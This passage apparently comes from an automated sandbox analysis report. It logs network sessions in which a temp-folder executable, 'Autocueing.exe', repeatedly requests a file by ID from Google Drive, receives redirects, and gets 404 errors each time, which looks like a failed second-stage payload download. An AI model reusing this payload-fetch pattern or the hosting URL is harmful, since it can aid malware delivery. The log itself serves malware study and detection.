                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-hCCoLovpycFQS0Jk5VH8uQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:29:03 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 56 4b 37 34 73 6b 6a 61 4a 31 7a 39 6a 65 56 55 73 2d 6d 30 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0VK74skjaJ1z9jeVUs-m0g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    54192.168.2.650040142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:29:04 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:29:05 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:04 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-Aopptl6mLgsL3WhRnjjzQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    55192.168.2.650041142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:29:05 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:29:06 UTC1844INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgT72STby2HpL8BfreZE_9hFyCve7O0nTXiHOd2kBVSE9AQa4NlO3iv_SrEacfmd4Z6x
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:06 GMT
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-VgnnsdqBP72rJbq2pd_sfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:29:06 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 37 6e 49 4f 75 39 54 53 62 45 48 47 49 69 6e 34 61 64 49 6f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="a7nIOu9TSbEHGIin4adIoA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    56192.168.2.650042142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:29:07 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:29:07 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:07 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-Qtkvoin_BrFYeuURqZR6Hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    57192.168.2.650043142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:29:08 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:29:08 UTC1844INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgTA7uK8NWEqkwmM9uFlVuFGAsg1auwHDoQxzWHYZYoWAYhf6XGYR-3RzBWJmtqQu-ol
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:08 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-Zn9Jjjap9ICX0aRIC6El9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:29:08 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 4e 79 5a 77 48 75 5a 77 35 35 36 37 30 70 39 37 73 70 4d 47 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iNyZwHuZw55670p97spMGw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    58192.168.2.650044142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:29:09 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:29:10 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:09 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-IL9m1ThhpXKq1MAOKmRrwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    59192.168.2.650045142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:29:10 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:29:11 UTC1851INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgTEoM0Zwsy96yCugUnNJBzM1_93b667AySGCPw-K_b46LDOJjRqw465ETxjN2Y4uEyMvJZ0B3Y
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:10 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-eMts4lZsweDBfob4_ZZZcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:29:11 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 66 6d 53 61 70 49 54 66 39 57 4e 57 78 69 62 33 38 61 43 64 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zfmSapITf9WNWxib38aCdg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    60192.168.2.650046142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
